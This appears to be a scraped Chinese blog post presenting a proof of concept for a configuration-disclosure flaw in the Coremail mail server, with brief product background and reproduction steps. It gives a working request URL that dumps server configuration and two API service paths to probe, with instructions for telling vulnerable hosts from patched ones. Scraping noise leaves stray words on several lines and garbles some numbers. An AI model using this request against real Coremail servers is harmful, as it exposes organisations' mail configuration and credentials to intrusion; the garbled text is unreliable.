Coremail接口存配置读取漏洞POC

Coremail产品诞生于1999年,通过二十多年发展,现在从亿万级别的运营系统,到几万人的大型企业,都有了Coremail的客户。api

截止2019年,Coremail邮件系统产品在国内已拥有10亿终端用户  ,是目前国内拥有邮箱使用用户最多的邮件系统。Coremail今天不但为网易(12六、16三、yeah)、移动,联通等知名运营商提供电子邮件总体技术解决方案及企业邮局运营服务,还为石油、钢铁、电力、政府、金融、教育、尖端制造企业等用户提供邮件系统软件和反垃圾服务。浏览器

 

 

复现手法app

1.mailsmsblog

浏览器访问  http://host/mailsms/s?func=ADMIN:appState&dumpConfig=/rem

出现一些配置文件信息 证实存在该漏洞产品

出现404或者页面空白 则证实漏洞不存在class

 

2.apiwsemail

http://host/apiws/services/软件

http://host/./apiws/services/配置

 

 

相关文章
相关标签/搜索